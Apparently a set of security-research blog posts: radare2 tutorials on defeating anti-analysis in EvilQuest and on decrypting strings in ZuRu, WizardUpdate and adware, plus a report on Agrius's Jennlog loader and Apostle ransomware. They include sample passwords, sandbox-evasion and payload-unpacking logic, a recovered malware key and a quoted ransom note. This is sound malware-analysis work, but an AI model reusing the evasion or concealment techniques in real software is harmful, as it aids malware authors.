Although we can achieve a lot from static analysis, sometimes it can be more efficient to execute the malware in a controlled environment and conduct dynamic analysis. Malware authors, however, may have other ideas and can set up various roadblocks to stop us doing exactly that. Consequently, one of the first challenges we often have to overcome is working around these attempts to prevent execution in our safe environment.

In this post, we’ll look at how to circumvent the malware author’s control flow to avoid executing unwanted parts of their code, learning along the way how to take advantage of some nice features of the r2 debugger! We’ll be looking at a sample of EvilQuest (password: infect3d), so fire up your VM and download it before reading on.

A note for the unwary: if you’re using Safari in your VM to download the file and you see “decompression failed”, go to Safari Preferences and turn off the ‘Open “safe” files after downloading’ option in the General tab and try the download again.

Getting Started With the radare2 Debugger

Our sample hit the headlines in July 2020, largely because at first glance it appeared to be a rare example of macOS ransomware. SentinelLabs quickly analyzed it and produced a decryptor to help any potential victims, but it turned out the malware was not very effective in the wild.

It may well have been a PoC, or a project still in early development stages, as the code and functionality have the look and feel of someone experimenting with how to achieve various attacker objectives. However, that’s all good news for us, as EvilQuest implements several anti-analysis features that will serve us as good practice.

The first thing you will want to do is remove any extended attributes and codesigning if the sample has a revoked signature. In this case, the sample isn’t signed at all, but if it were we could use:

% sudo codesign --remove-signature <path to bundle or file>

If we need the sample to be codesigned for execution, we can also sign it (remember your VM needs to have installed the Xcode command line tools via xcode-select --install) with:

% sudo codesign -fs - <path to bundle or file> --deep

We’ll remove the extended attributes to bypass Gatekeeper and Notarization checks with

% xattr -rc <path to bundle or file>

And we’ll attempt to attach to the radare2 debugger by adding the -d switch to our initialization command:

% r2 -AA -d patch

Unfortunately, our first attempt doesn’t go well. We already removed the extended attributes and codesigning isn’t the issue here, but the radare2 debugger fails to attach.

Failing to attach the debugger.

That ptrace: Cannot Attach: Invalid argument looks ominous, but actually the error message is misleading. The problem is that we need elevated privileges to debug, so a simple sudo should get us past our current obstacle.

The debugger needs elevated privileges

Yay, attach success! Let’s take a look around before we start diving further into the debugger.

A Faster Way of Finding XREFS and Interesting Code

Let’s run afll as we did when analyzing OSX.Calisto previously, but this time we’ll output the function list to file so that we can sort it and search it more conveniently without having to keep running the command or scrolling up in the Terminal window.

> afll > functions.txt

Looking through our text file, we can see there are a number of function names that could be related to some kind of anti-analysis.

Some of EvilQuest’s suspected anti-analysis functions

We can see that some of these only have a single cross-reference, and if we dig into these using the axt command, we see the cross-reference (XREF) for the is_virtual_mchn function happens to be main(), so that looks like a good place to start.

Getting help on radare2’s axt command

> axt sym._is_virtual_mchn
main 0x10000be5f [CALL] sym._is_virtual_mchn

Many commands in r2 support tab expansion

Here’s a useful power trick for those already comfortable with r2. You can run any command in a for-each loop using @@. For example, with

axt @@f:<search term>

we can get the XREFS to any function containing the search term in one go.

In this case I tell r2 to give me the XREFS for every function that contains “_is_”. Then I do the same with “get”. Try @@? to see more examples of what you can do with @@.

Using a for-each in radare2

Since we see that is_virtual_mchn is called in main, we should start by disassembling the entire main function to see what’s going on, but first I’m going to change the r2 color theme to something a bit more reader-friendly with the eco command (try eco and hit the tab key to see a list of available themes).

eco focus
pdf @ main

Visual Graph Mode and Renaming Functions with Radare2

As we scroll back up to the beginning of the function, we can see the disassembly provides pretty interesting reading. At the beginning of main, we can see some unnamed functions are called. We’re going to jump into Visual Graph mode and start renaming code as this will give us a good idea of the malware’s execution flow and indicate what we need to do to beat the anti-analysis.

Hit VV to enter Visual Graph mode. I will try to walk you through the commands, but if you get lost at any point, don’t feel bad. It happens to us all and is part of the r2 learning curve! You can just quit out and start again if need be (part of the beauty of r2’s speed; you can also save your project: type uppercase P? to see project options).

I prefer to view the graph as a horizontal, left-to-right flow; you can toggle between horizontal and vertical by pressing the @ key.

Viewing the sample’s visual graph horizontally

Here’s a quick summary of some useful commands (there are many more as you’ll see if you play around):

  • hjkl(arrow keys) – move the graph around
  • -/+0 – reduce, enlarge, return to default size
  • ‘ – toggle graph comments
  • tab/shift-tab – move to next/previous function
  • dr – rename function
  • q – back to visual mode
  • t/f – follow the true/false execution chain
  • u – go back
  • ? – help/available options

Hit ' once or twice to make sure graph comments are on.
Use the tab key to move to the first function after main() (the border will be highlighted), where we can see an unnamed function and a reference in square brackets that begins with the letter ‘o’ (for example, [ob], though it may be different in your sample). Type the letters (without the square brackets) to go to that function. Type p to rotate between different display modes till you see something similar to the next image.

As we can see, this function call is actually a call to the standard C library function strcmp(), so let’s rename it.

Type dr and at the prompt type in the name you want to use and hit ‘enter’. Unsurprisingly, I’m going to call it strcmp.

To return to the main graph, type u and you should see that all references to that previously unnamed function now show strcmp, making things much clearer.

If you scroll through the graph (hjkl, remember) you will see many other unnamed functions that, once you explore them in the same way, are just relocations of standard C library calls such as exit, time, sleep, printf, malloc, srandom and more. I suggest you repeat the above exercise and rename as many as you can. This will both make the malware’s behaviour easier to understand and build up some valuable muscle-memory for working in r2!

Beating Anti-Analysis Without Patching

There are two approaches you can take to interrupt a program’s designed logic. One is to identify functions you want to avoid and patch the binary statically. This is fairly easy to do in r2 and there are quite a few tutorials on how to patch binaries already out there. We’re not going to look at patching today because our entire objective is to run the sample dynamically, so we might as well interact with the program dynamically as well. Patching is really only worth considering if you need to create a sample for repeated use that avoids some kind of unwanted behaviour.

We basically have two easy options in terms of affecting control flow dynamically. We can either execute the function but manipulate the returned value (like put 0 in rax instead of 1) or skip execution of the function altogether.

We’ll see just how easy it is to do each of these, but we should first think about the different consequences of each choice based on the malware we’re dealing with.

If we NOP a function or skip over it, we’re going to lose any behaviour or memory states invoked by that function. If the function doesn’t do anything that affects the state of our program later on, this can be a good choice.

By the same token, if we execute the function but manipulate the value it returns, we may be allowing execution of code buried in that function that might trip us up. For example, if our function contains jumps to subroutines that do further anti-analysis tests, then we might get blocked before the parent function even returns, so this strategy wouldn’t help us. Clearly then, we need to take a look around the code to figure out which is the best strategy in each particular case.

Let’s take a look inside the _is_virtual_mchn function to see what it would do and work out our strategy.

If you’re still in Visual Graph mode, hit q to get back to the r2 prompt. Regardless of where you are, you can disassemble a function with pdf and the @ symbol and provide a flag or address. Remember, you can also use tab expansion to get a list of possible symbols.

It seems this function subtracts the sleep interval from the second timestamp, then compares it against the first timestamp. Jumping back out to how this result is consumed in main, it seems that if the result is not ‘0’, the malware calls exit() with ‘-1’.

The is_virtual_mchn function causes the malware to exit unless it returns ‘0’

The function appears to be somewhat misnamed as we don’t see the kind of tests that we would normally expect for VM detection. In fact, it looks like an attempt to evade automated sandboxes that patch the sleep function, and we’re not likely to fall foul of it just by executing in our VM. However, we can also see that the next function, user_info, also exits if it doesn’t return the expected value, so let’s practice both the techniques discussed above so that we can learn how to use the debugger whichever one we need to use.
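The timestamp arithmetic described above can be re-implemented for illustration. The sketch below is a hypothetical model, not the malware's code: the malware works on whole-second timestamps, here replaced with time.monotonic(), and the one-second tolerance is our own assumption to absorb scheduler jitter.

```python
import time

def is_virtual_mchn(interval: int) -> bool:
    """Return True if a sandbox-style patched sleep() is detected.

    Take a timestamp, sleep, take a second timestamp, subtract the
    requested sleep interval and compare against the first timestamp.
    If sleep() returned immediately, the arithmetic no longer lines up.
    """
    t1 = time.monotonic()
    time.sleep(interval)
    t2 = time.monotonic()
    return abs((t2 - interval) - t1) > 1  # 1s tolerance (our assumption)
```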

Manipulating Execution with the radare2 Debugger

If you are at the command prompt, type Vp to go into radare2 visual mode (yup, this is another mode, and not the last!).

The Visual Debugger in radare2

Ooh, this is nice! We get registers at the top, and source code underneath. The current line where we’re stopped in the debugger is highlighted. If you don’t see that, hit uppercase S once (i.e., shift-s), which steps over one source line, and – in case you lose your way – also brings you back to the debugger view.

Let’s step smartly through the source with repeated uppercase S commands (by the way, in visual mode, lowercase ‘s’ steps in, whereas uppercase ‘S’ steps over). After a dozen or so rapid step overs, you should find yourself inside this familiar code, which is main().

main() in Visual Debugger mode

Note the highlighted dword, which is holding the value of argc. It should be ‘2’, but we can see from the register above that rdi is only 1. The code will jump over the next function call, which if you hit the ‘1’ key on the keyboard you can inspect (hit u to come back) and see this is a string comparison. Let’s continue stepping over and let the jump happen, as it doesn’t appear to block us. We’ll stop just short of the is_virtual_mchn function.

Seek and break locations are two different things!

We know from our earlier discussion what’s going to happen here, so let’s see how to take each of our options.

The first thing to note is that although the highlighted address is where the debugger is, that’s not where you are if you enter an r2 command prompt, unless it’s a debugger command. To see what I mean, hit the colon key to enter the command line.

From there, print out one line of disassembly with this command:

 > pd 1

Note that the line printed out is r2’s current seek position, shown at the top of the visual view. This is good. It means you can move around the program, seek to other functions and run other r2 commands without disturbing the debugger.

On the other hand, if you execute a debugger command on the command line it will operate on the source code where the debugger is currently parked, not on the current seek at the top of your view (unless they happen to be the same).

OK, let’s entirely skip execution of the _is_virtual_mchn function by entering the command line with : and then:

 > dss 2

Hit ‘return’ twice. As you can see, the dss command skips the number of instructions specified by the integer you gave it, making it a very easy way to bypass unwanted code execution!

Alternatively, if we want to execute the function then manipulate the register, stop the debugger on the line where the register is compared, and enter the command line again. This time, we can use dr to both inspect and write values to our chosen register.

> dr eax       // see eax’s current value
> dr eax = 0   // set eax to 0
> drr          // view all the registers
> dro          // see the previous values of the registers

Viewing and changing register values

And that, pretty much, is all you need to defeat anti-analysis code in terms of manipulating execution. Of course, the fun part is finding the code you need to manipulate, which is why we spent some time learning how to move around in radare2 in both visual graph mode and visual mode. Remember that in either mode you can get back to the regular command prompt by hitting q. As a bonus, you might play around with hitting p and tab when in the visual modes.

At this point, what I suggest you do is go back to the list of functions we identified at the beginning of the post and see what they do, and whether it’s best to skip them or modify their return values (or whether either option will do). You might want to look up the built-in help for listing and setting breakpoints (from a command prompt, try db?) to move quickly through the code. By the time you’ve done this a few times, you’ll be feeling pretty comfortable about tackling other samples in radare2’s debugger.


If you’re starting to see the potential power of r2, I strongly suggest you read the free online radare2 book, which will be well worth investing the time in. By now you should be starting to get the feel of r2 and exploring more on your own with the help of the ? and other resources. As we go into further challenges, we’ll be spending less time going over the r2 basics and digging more into the actual malware code.

In the next part of our series, we’re going to start looking at one of the major challenges in reversing macOS malware that you are bound to face on a regular basis: dealing with encrypted and obfuscated strings. I hope you’ll join us there and practice your r2 skills in the meantime!

New Version Of Apostle Ransomware Reemerges In Targeted Attack On Higher Education

30 September 2021 at 16:20

SentinelLabs has been tracking the activity of Agrius, a suspected Iranian threat actor operating in the Middle East, throughout 2020 and 2021 following a set of destructive attacks starting December 2020. Since we last reported on this threat actor in May 2021, Agrius lowered its profile and was not observed conducting destructive activity. This changed recently as the threat actor likely initiated a ransomware attack on the Israeli university Bar-Ilan utilizing the group’s custom Apostle ransomware.

Although the full technical details of the incident were not disclosed publicly, some information was released to the public, most notably the ransom demand text file dropped on victim machines. The .txt file matches that from a new version of Apostle compiled on August 15, 2021, the day of the attack.

The new version of Apostle is obfuscated, encrypted and compressed as a resource in a loader we call Jennlog, as it attempts to masquerade its payloads, stored in resources, as log files. Before executing the Apostle payload, Jennlog runs a set of tests to verify that it is not being executed in an analysis environment, based on an embedded configuration. Following the analysis of the Jennlog loader, SentinelLabs retrieved an additional variant of Jennlog, used to load and run OrcusRAT.

Jennlog Analysis

Jennlog (5e5e526a69490399494dcd7195bb6c67) is a .NET loader that deobfuscates, decompresses and decrypts a .NET executable from a resource embedded within the file. The resources within the loader appear to look like log files, and it contains both the binary to run as well as a configuration for the malware’s execution.

Jennlog attempts to extract two different resources:

  • – stores Apostle payload and the configuration.
  • helloworld.Certificate.txt – contains None. If configured to do so, the malware compares the MD5 value of the system information (used as system fingerprint) to the contents of this resource.

The payload hidden in “” appears to look like a log file at first sight:

Contents of “” resource embedded within Jennlog

The payload is extracted from the resource by searching for a separator word – “Jennifer”. Splitting the contents of the resource results in an array of three strings:

  1. Decoy string – Most likely there to make the log file look more authentic.
  2. Configuration string – Used to determine the configuration of the malware execution.
  3. Payload – An obfuscated, compressed and encrypted file.
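
The split-on-separator step can be sketched in a few lines of Python. This is an illustrative model only; the function name and the three-part layout are taken from the description above, not from the binary.

```python
def split_resource(resource: str, separator: str = "Jennifer"):
    """Split Jennlog's fake log resource on the separator word into the
    decoy string, the configuration string, and the obfuscated payload."""
    parts = resource.split(separator)
    if len(parts) != 3:
        raise ValueError("unexpected resource layout")
    decoy, config, payload = parts
    return decoy, config, payload
```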


The configuration of Jennlog consists of 13 values, 12 of which are actually used in this version of the malware. In the variants we were able to retrieve, all of these flags are set to 0.

Jennlog configuration values

One of the most interesting flags found here is the certificate flag. If this flag is set, it will cause the malware to run only on a specific system. If this system does not match the configured MD5 fingerprint, the malware either stops operation or deletes itself utilizing the function ExecuteInstalledNodeAndDelete(), which creates and runs a BAT file as observed in other Agrius malware.
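The certificate check amounts to a simple MD5 comparison. The following sketch models that logic; the function and parameter names are ours, and how the malware assembles its system-information string is an assumption left abstract here.

```python
import hashlib

def certificate_check(system_info: str, expected_md5_hex: str) -> bool:
    """Compare the MD5 of the system fingerprint against the value stored
    in the helloworld.Certificate.txt resource."""
    fingerprint = hashlib.md5(system_info.encode("utf-8")).hexdigest()
    return fingerprint == expected_md5_hex.strip().lower()
```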

Jennlog ExecuteInstalledNodeAndDelete() function

Following all the configuration based-checks, Jennlog continues to unpack the main binary from within the resource “” by performing the following string manipulations in the function EditString() on the obfuscated payload:

  • Replace all “\nLog” with “A”.
  • Reverse the string.
  • Remove all whitespaces.

This manipulation will result in a long base64-encoded deflated content, which is inflated using the function stringCompressor.Unzip(). The inflated content highly resembles the contents of the original obfuscated payload, and it is deobfuscated again using the EditString() function.
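The two-stage unpacking can be modelled in Python. The three EditString() manipulations are taken from the list above; modelling stringCompressor.Unzip() as base64 plus raw deflate (no zlib header) is our assumption, based on the behavior of .NET's DeflateStream.

```python
import base64
import zlib

def edit_string(obfuscated: str) -> str:
    """Sketch of Jennlog's EditString() deobfuscation steps."""
    s = obfuscated.replace("\nLog", "A")   # 1. replace every "\nLog" with "A"
    s = s[::-1]                            # 2. reverse the string
    return "".join(s.split())              # 3. remove all whitespace

def unzip(b64_deflated: str) -> bytes:
    """Model of stringCompressor.Unzip(): base64-decode, then inflate.
    wbits=-15 selects raw deflate (assumed; .NET DeflateStream omits the
    zlib header)."""
    return zlib.decompress(base64.b64decode(b64_deflated), -15)
```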

The deobfuscation of the inflated content is carried out in a rather peculiar way, being run as a “catch” statement after attempting to turn a string containing a URL to int, which will always result in an error. The domain presented in the URL was never bought, and highly resembles other Agrius malware unpurchased domains, often used as “Super Relays”. Here, however, the domain is not actually contacted.

Execution of EditString() function as a catch statement

Following a second run of the EditString() function, Jennlog decodes the extracted content and decrypts it using an implementation of RC4 with a predefined key. The extracted content found in this sample is a new version of the Apostle ransomware, which is loaded into memory and ran using the parameters given to Jennlog at execution.
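For reference, plain RC4 (key-scheduling plus pseudo-random generation) is short enough to reproduce; this is the textbook algorithm, not code lifted from Jennlog, and the sample's predefined key is not reproduced here.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: identical for encryption and decryption."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm (KSA)
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # pseudo-random generation (PRGA)
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)
```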

Apostle Ransomware Analysis

The new variant of Apostle (cbdbda089f7c7840d4daed22c34969fd876315b6) embedded within the Jennlog loader was compiled on August 15, 2021, the day the attack on Bar-Ilan university was carried out. Its execution flow is highly similar to the variant described in previous reports, and it even checks for the same Mutex as the previous ransomware variant.

The message embedded within it, however, is quite different:

Ooops, Your files are encrypted!!! Don't worry,You can return all your files! 
If you want to restore theme, Send $10000 worth of Monero to following address :  
Then follow this Telegram ID :  hxxps://t[.]me/x4ran

This is the exact same message that was released to the media in the context of the Bar-Ilan ransomware incident, as reported on ynet:

Ransom demand text file as seen in Bar-Ilan university

Other than the ransom demand note, the wallpaper picture used on affected machines was also changed, this time presenting an image of a clown:

New Apostle variant wallpaper image

OrcusRAT Jennlog Loader

An additional variant of Jennlog (43b810f918e357669be42030a1feb727) was uploaded to VirusTotal on July 14, 2021 from Iran. This variant is highly similar to the one used to load Apostle, and contains a similar configuration scheme (all values set to 0). It is used to load a variant of OrcusRAT, which is extracted from the file’s resources in a similar manner.

The OrcusRAT variant (add7b6b60e746c36a66f5ec233873372) extracted from within it was submitted to VT on June 20, 2021 using the same submitter ID from Iran. It seems to connect to an internal IP address –, indicating it might have been used for testing. It also contained the following PDB path:



Agrius has shown a willingness to strategically wipe systems and has continued to evolve its toolkit to enable ransomware operations. At this time, we don’t know if the actor is committed to financially-motivated operations, but we do know the original intent was sabotage. We expect the sort of subterfuge seen here to be deployed in future Agrius operations. SentinelLabs continues to track the development of this nascent threat actor.

Technical Indicators

Jennlog Loader (Apostle Loader)

  • 5e5e526a69490399494dcd7195bb6c67
  • c9428afa269bbf8c48a08a7109c553163d2051e7
  • 0ba324337b1d76a5afc26956d4dc9f57786483230112eaead5b5c92022c089c7

Apostle – Bar-Ilan variant

  • fc8221382521a40ec0042431a947a3ca
  • cbdbda089f7c7840d4daed22c34969fd876315b6
  • 44c13c46d4f597ea0625f1c87eecffe3cd5dcd257c5fac18a6fa931ba9b5f97a

Jennlog Loader (OrcusRAT Loader)

  • 43b810f918e357669be42030a1feb727
  • 3de36410a99cf3bd8e0c56fdeafa32bbf7625af1
  • 14659857df1753f720ac797a43a9c3f3e241c3df762de7f50bbbae00feb818c9


  • add7b6b60e746c36a66f5ec233873372
  • a35bffc49871bb3a48bdd35b4a4d04d208f23487
  • 069686119adc13e1785cb7a425611d1ec13f33ae75962a7e50e00414209d1809

Techniques for String Decryption in macOS Malware with Radare2

12 October 2021 at 17:52

If you’ve been following this series so far, you’ll have a good idea how to use radare2 to quickly triage a Mach-O binary statically and how to move through it dynamically to beat anti-analysis attempts. But sometimes, no matter how much time you spend looking at disassembly or debugging, you’ll hit a roadblock trying to figure out your macOS malware sample’s most interesting behavior because much of the human-readable ‘strings’ have been rendered unintelligible by encryption and/or obfuscation.

That’s the bad news; the good news is that while encryption is most definitely hard, decryption is, at least in principle, somewhat easier. Whatever methods are used, at some point during execution the malware itself has to decrypt its code. This means that, although there are many different methods of encryption, most practical implementations are amenable to reverse engineering given the right conditions.

Sometimes, we can do our decryption statically, perhaps emulating the malware’s decryption method(s) by writing our own decryption logic(s). Other times, we may have to run the malware and extract the strings as they are decrypted in memory. We’ll take a practical look at using both of these techniques in today’s post through a series of short case studies of real macOS malware.

First, we’ll look at an example of AES 128 symmetric encryption used in the recent macOS.ZuRu malware and show you how to quickly decode it; then we’ll decrypt a Vigenère cipher used in the WizardUpdate/Silver Toucan malware; finally, we’ll see how to decode strings dynamically, in-memory while executing a sample of a notorious adware installer.

Although we cannot cover all the myriad possible encryption schemes or methods you might encounter in the wild, these case studies should give you a solid basis from which to tackle other encryption challenges. We’ll also point you to some further resources showcasing other macOS malware decryption strategies to help you expand your knowledge.

For our case studies, you can grab a copy of the malware samples we’ll be using from the following links:

  1. macOS.ZuRu pwd:infect3d
  2. WizardUpdate
  3. Adware Installer

Don’t forget to use an isolated VM for all this work: these are live malware samples and you do not want to infect your personal or work device!

Breaking AES Encryption in macOS.ZuRu

Let’s begin with a recent strain of new macOS malware dubbed ‘macOS.ZuRu’. This malware was distributed inside trojanized applications such as iTerm, MS Remote Desktop and others in September 2021. Inside the malware’s application bundle is a Frameworks folder containing the malicious libcrypto.2.dylib. The sample we’re going to look at has the following hash signatures:

md5 b5caf2728618441906a187fc6e90d6d5
sha1 9873cc929033a3f9a463bcbca3b65c3b031b3352
sha256 8db4f17abc49da9dae124f5bf583d0645510765a6f7256d264c82c2b25becf8b

Let’s load it into r2 in the usual way (if you haven’t read the earlier posts in this series, catch up here and here), and consider the simple sequence of reversing steps illustrated in the following images.

Getting started with our macOS.ZuRu sample

As shown in the image above, after loading the binary, we use ii to look at the imports, and see among them CCCrypt (note that I piped this to head for display purposes). We then do a case insensitive search on ‘crypt’ in the functions list with afll~+crypt.

If we add [0] to the end of that, it gives us just the first column of addresses. We can then do a for-each over those using backticks to pipe them into axt to grab the XREFS. The entire command is:

> axt @@=`afll~crypt[0]`

The result, as you can see in the lower section of the image above, shows us that the malware uses CCCrypt to call the AESDecrypt128 block cipher algorithm.

AES128 requires a 128-bit key, which is the equivalent of 16 bytes. Though there’s a number of ways that such a key could be encoded in malware, the first thing we should do is a simple check for any 16 byte strings in the binary.

To do that quickly, let’s pipe the binary’s strings through awk and filter on the len column for ‘16’: That’s the fourth column in r2’s iz output. We’ll also narrow down the output to just cstrings by grepping on ‘string’, so our command is:

> iz | awk '$4==16' | grep string

We can see the output in the middle section of the following image.

Filtering the malware’s strings for possible AES 128 keys

We got lucky! There’s two occurrences of what is obviously not a plain text string. Of course, it could be anything, but if we check out the XREFS we can see that this string is provided as an argument to the AESDecrypt method, as illustrated in the lower section of the above image.

All that remains now is to find the strings that are being deciphered. If we get the function summary of AESDecrypt from the address shown in our last command, 0x348b, it reveals that the function is using base64 encoded strings.

> pds @ 0x348b
Grabbing a function summary in r2 with the pds command

A quick and dirty way to look for base64 encoded strings is to grep on the “=” sign. We’ll use r2’s own grep function, ~ and pipe the result of that through another filter for “str” to further refine the output.

> iz~=~str
A quick-and-dirty grep for possible base64 cipher strings

Our search returns three hits that look like good candidates, but the proof is in the pudding! What we have at this point is candidates for:

  1. the encryption algorithm – AES128
  2. the key – “quwi38ie87duy78u”
  3. three ciphers – “oPp2nG8br7oIB+5wLoA6Bg==, …”

All we need to do now is to run our suspects through the appropriate decryption routine for that algorithm. There are online tools such as Cyber Chef that can do that for you, or you can find code for most popular algorithms for your favorite language from an online search. Here, we implemented our own rough-and-ready AES128 decryption algorithm in Go to test out our candidates:

A simple AES128 ECB decryption algorithm implemented in Go

We can pipe all the candidate ciphers to file from within r2 and then use a shell one-liner in a separate Terminal window to run each line through our Go decryption script with the candidate key.

Revealing the strings in clear text with our Go decrypter

And voila! With a few short commands in r2 and a bash one-liner, we’ve decrypted the strings in macOS.ZuRu and found a valuable IoC for detection and further investigation.

Decoding a Vigenère Cipher in WizardUpdate Malware

In our second case study, we’re going to take a look at the string encryption used in a recent sample of WizardUpdate malware. The sample we’ll look at has the following hash signatures:

md5 0c91ddaf8173a4ddfabbd86f4e782baa
sha1 3c224d8ad6b977a1899bd3d19d034418d490f19f
sha256 73a465170feed88048dbc0519fbd880aca6809659e011a5a171afd31fa05dc0b

We’ll follow the same procedure as last time, beginning with a case insensitive search of functions with “crypt” in the name, filtering the results of that down to addresses, and getting the XREFS for each of the addresses. This is what it looks like on our new sample:

Finding our way to the string encryption code from the function analysis

We can see that there are several calls from main to a decrypt function, and that function itself calls sym.decrypt_vigenere.

Vigenère is a well-known cipher algorithm which we will say a bit more about shortly, but for now, let’s see if we can find any strings that might be either keys or ciphers.

Since a lot of the action is happening in main, let’s do a quick pds summary on the main function.

Using pds to get a quick summary of a function

There are at least two strings of interest. Let’s take a better look by leveraging r2’s afns command, which lists all strings associated with the current function.

r2’s afns can help you isolate strings in a function

That gives us a few more interesting looking candidates. Given its length and form, my suspicion at this point is that the “LBZEWWERBC” string is likely the key.

We can isolate just the strings we want by successive filtering. First, we get just the rows we want:

> afns~:1..5

And then grab just the last column (ignoring the addresses):

> afns~:1..5[2]

Then using sed to remove the “str.” prefix and grep to remove the “{MAID}” string, we end up with:

Access to the shell in r2 makes it easy to isolate the strings of interest

As before, we can now pipe these out to a “ciphers” file.

> afns~:1..5[2] | grep -v MAID | sed 's/str.//g' > ciphers

Let’s next turn to the encryption algorithm. Vigenère has a fascinating history. Once thought to be unbreakable, it’s now considered highly insecure for cryptography. In fact, if you like puzzles, you can decrypt a Vigenère cipher with a manual table.

The Vigenère cipher was invented before computers and can be solved by hand

One of the Vigenère cipher’s weaknesses is that it’s possible to discern patterns in the ciphertext that can reveal the length of the key. That problem can be avoided by encrypting a base64 encoding of the plain text rather than the plain text itself.
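To make the scheme concrete, here is a minimal sketch of Vigenère decryption over a custom alphabet, with base64 applied to the plain text first. The alphabet below is illustrative (not the one recovered from the sample), though the key is our “LBZEWWERBC” candidate:

```python
import base64

# Illustrative alphabet; WizardUpdate ships its own inside the binary.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
KEY = "LBZEWWERBC"

def vigenere(text, key, alphabet, decrypt=False):
    out, ki = [], 0
    for ch in text:
        if ch not in alphabet:        # pass through characters outside the alphabet
            out.append(ch)
            continue
        shift = alphabet.index(key[ki % len(key)])
        if decrypt:
            shift = -shift
        out.append(alphabet[(alphabet.index(ch) + shift) % len(alphabet)])
        ki += 1
    return "".join(out)

# Encrypt a base64 encoding of the plain text rather than the plain text itself,
# then reverse both steps.
cipher = vigenere(base64.b64encode(b"whoami").decode(), KEY, ALPHABET)
plain = base64.b64decode(vigenere(cipher, KEY, ALPHABET, decrypt=True))
```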

Now, if we jump back into radare2, we’ll see that WizardUpdate does indeed decode the output of the Vigenère function with a base64 decoder.

WizardUpdate malware uses base64 encoding either side of encrypting/decrypting

Aside from the key and the ciphertext, there is one other thing we need in order to decipher a Vigenère cipher: the alphabet used in the table. Let’s use another r2 feature to see if it can help us find it. Radare2’s search function, /, has some crypto search functionality built in. Use /c? to view the help on this command.

Search for crypto materials with built-in r2 commands

The /ck search gives us a hit which looks like it could function as the Vigenère alphabet.

OK, it’s time to build our decoder. This time, I’m going to adapt a Python script from here, and then feed it our ciphers file just as before. The only differences are that I’m going to hardcode the alphabet in the script and run the output through base64. Let’s see how it looks.

Decoding the strings returns base64 as expected

So far so good. Let’s try running those through base64 -D (decode) and see if we get our plain text.

Our decoder returns gibberish after we try to decode the base64

Hmm. The script runs without error, but the final decoded base64 output is gibberish. That suggests that while our key and ciphers are correct, our alphabet might not be.

Returning to r2, let’s search more widely across the strings with iz~string.

Finding cstrings in the TEXT section with r2’s ~ filter

The first hit actually looks similar to the one we tried, but with fewer characters and a different order, which will also affect the result in a Vigenère table. Let’s try again using this as the hardcoded alphabet.

Decoding the WizardUpdate’s encrypted strings back to plain text

Success! The first cipher turns out to be an encoding of the system_profiler command that returns the device’s serial number, while the second contains the attacker’s payload URL. The third downloads the payload and executes it on the victim’s device.

Reading Encrypted Strings In-Memory

Reverse engineering is a multi-faceted puzzle, and often the pieces drop into place in no particular order. When our triage of a malware sample suggests a known or readily identifiable encryption scheme has been used as we saw with macOS.ZuRu and WizardUpdate, decrypting those strings statically can be the first domino that makes the other pieces fall into place.

However, when faced with a recalcitrant sample on which the authors have clearly spent a great deal of time second-guessing possible reversing moves, a ‘cheaper’ option is to detonate the malware and observe the strings as they are decrypted in memory. Of course, to do that, you might need to defeat some anti-analysis and anti-debugging tricks first!

In our third case study, then, we’re going to take a look at a common adware installer. Adware is big business, employs lots of professional coders, and produces code that is every bit as crafty as any sophisticated malware you’re likely to come across. If you spend any time dealing with infected Macs, coming across adware is inevitable, so knowing how to deal with it is essential.

md5 cfcba69503d5b5420b73e69acfec56b7
sha1 e978fbcb9002b7dace469f00da485a8885946371
sha256 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537

Let’s dump this into r2 and see what a quick triage can tell us.

This sample is keeping its secrets

Well, not much! If we print the disassembly for the main function with pdf @main, we see a mass of obfuscated code.

Lots of obfuscated code in this adware installer

However, the only calls here are to system and remove, as we saw from the function list. Let’s quit and reopen in r2’s debugger mode (remember: you may need to chmod the sample and remove any code signature and extended attributes as explained here).

sudo r2 -AA -d 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537

Let’s find the entrypoint with the ie command. We’ll set a breakpoint on that and then execute to that point.

Breaking on the entrypoint

Now that we’re at main, let’s break on the system call and take a look at the registers. To do that, first get the address of the system flag with

> f~system

Then set the breakpoint on the address returned with the db command. We can continue execution with dc.

Setting a breakpoint on the system call and continuing execution

Note that in the image above, our first attempt to continue execution results in a warning message and we actually hit our main breakpoint again. If this happens, repeating the dc command should get you past the warning. Now we can look at all the registers with drr.

Revealing the encoded strings in memory

At the rdi register, we can see the beginning of the decrypted string. Let’s see the rest of it.

The clear text is revealed in the rdi register

Ah, an encoded shell script, typical of Bundlore and Shlayer malware. One of my favorite things about r2 is how you can do a lot of otherwise complex things very easily thanks to the shell integration. Want to pretty-print that script? Just pipe the same command through sed from right within r2.

> ps 2048 @rdi | sed 's/;/\n/g'

We can easily format the output by piping it through the sed utility

More Examples of macOS String Decryption Techniques

WizardUpdate and macOS.ZuRu provided us with some real-world malware samples where we could use the same general technique: identify the encryption algorithm in the functions table, search for and isolate the key and ciphers in the strings, and then find or implement an appropriate decoding algorithm.

Some malware authors, however, will implement custom encryption and decryption schemes and you’ll have to look more closely at the code to see how the decryption routine works. Alternatively, where necessary, we can detonate the code, jump over any anti-analysis techniques and read the decrypted strings directly from memory.

If all this has piqued your interest in string encryption techniques used in macOS malware, then you might like to check out some or all of the following for further study.

EvilQuest, which we looked at in the previous post, is one example of malware that uses a custom encryption and decryption algorithm. SentinelLabs broke the encryption statically, and then created a tool based on the malware’s own decryption algorithm to decrypt any files locked by the malware. Fellow macOS researcher Scott Knight also published his Python decryption routine for EvilQuest, which is worth close study.

Adload is another malware that uses a custom encryption scheme, and for which researchers at Confiant also published decryption code.

Notorious adware dropper platforms Bundlore and Shlayer use a complex and varying set of shell obfuscation techniques which are simple enough to decode but interesting in their own right.

Likewise, XCodeSpy uses a simple but quite effective shell obfuscation trick to hide its strings from simple search tools and regex pattern matches.


